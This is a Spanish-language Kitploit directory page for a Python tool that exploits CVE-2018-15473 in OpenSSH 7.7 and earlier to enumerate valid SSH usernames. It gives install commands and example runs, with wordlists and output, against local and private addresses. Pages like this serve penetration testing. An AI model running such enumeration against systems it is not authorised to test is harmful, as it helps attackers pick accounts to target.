Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2018-15473 — Script de Python para enumerar nombres de usuario SSH válidos explotando CVE-2018-15473, una vulnerabilidad de enumeración de usuarios en OpenSSH hasta 7.7. | Kitploit
Herramientas/GitHubGitHub/wh1t3fox/cve-2018-15473
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHubwh1t3fox/cve-2018-15473

cve-2018-15473

Script de Python para enumerar nombres de usuario SSH válidos explotando CVE-2018-15473, una vulnerabilidad de enumeración de usuarios en OpenSSH hasta 7.7.

Ver Repositorio
3hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-15473

OpenSSH hasta la versión 7.7 es propenso a una vulnerabilidad de enumeración de usuarios debido a que no retrasa la salida para un usuario de autenticación inválido hasta que el paquete que contiene la solicitud haya sido completamente analizado, relacionado con auth2-gss.c, auth2-hostbased.c y auth2-pubkey.c.

Instalación

Puede que necesites instalar el paquete equivalente openssl-dev de tu distribución

root@kitploit:~
# NOTA: si estás instalando en kali, puedes omitir el pip install; paramiko ya está ahí.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - O - 
pipenv install -r requirements.txt  # si eres así de genial   
chmod u+x ssh-username-enum.py

Ejemplos

Un solo nombre de usuario

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Usa una lista de palabras con 10 hilos (el valor predeterminado es 4)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

Dirección IPv6 en el puerto 2222 y VERBOSIDAD AUMENTADA!

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
Descargar herramienta